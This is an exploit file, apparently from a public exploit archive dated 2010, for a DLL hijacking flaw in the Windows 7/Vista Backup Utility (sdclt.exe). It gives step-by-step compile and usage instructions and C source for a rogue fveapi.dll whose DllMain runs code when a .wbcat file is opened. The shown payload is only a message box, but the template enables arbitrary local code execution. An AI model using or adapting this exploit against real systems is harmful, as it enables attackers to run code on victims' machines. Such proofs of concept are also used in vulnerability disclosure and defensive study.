Windows 7 / Vista Backup Utility sdclt.exe fveapi.dll DLL Hijacking Exploit

`/*  
  
Windows 7 and Vista Backup Utility sdclt.exe fveapi.dll DLL Hijacking Exploit  
  
Found by: Christian Heinrich (cmlh)  
Exploit by: Christian Heinrich (cmlh)  
  
Email: [email protected]  
Web: http://www.twitter.com/cmlh  
  
Summary: Microsoft Windows Backup application (sdclt.exe) for Windows Vista/7 exploit  
  
Description: Microsoft Windows Backup application (sdclt.exe) suffers from a dll hijacking vulnerability  
that enables the attacker to execute arbitrary code on a local level through the .wbcat extension.  
  
----  
  
Howto:  
  
gcc -shared -o fveapi.dll windowsbackupexploit.c  
  
Compile this file and rename to fveapi.dll  
  
Then create an empty file named anything.wbcat  
  
Double clicking the anything.wbcat file with the fveapi.dll file in the same folder will execute  
our code.  
  
----  
  
Tested on Microsoft Windows 7 32-bit  
  
Vulnerability discovered by Christian Heinrich (cmlh)  
  
  
[email protected]  
  
27.08.2010  
  
*/  
  
  
#include <windows.h>  
  
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
{  
  
switch (fdwReason)  
{  
case DLL_PROCESS_ATTACH:  
dll_mll();  
case DLL_THREAD_ATTACH:  
case DLL_THREAD_DETACH:  
case DLL_PROCESS_DETACH:  
break;  
}  
  
return TRUE;  
}  
  
int dll_mll()  
{  
MessageBox(0, "Hacked by Christian Heinrich !", "DLL Message", MB_OK);  
}  
`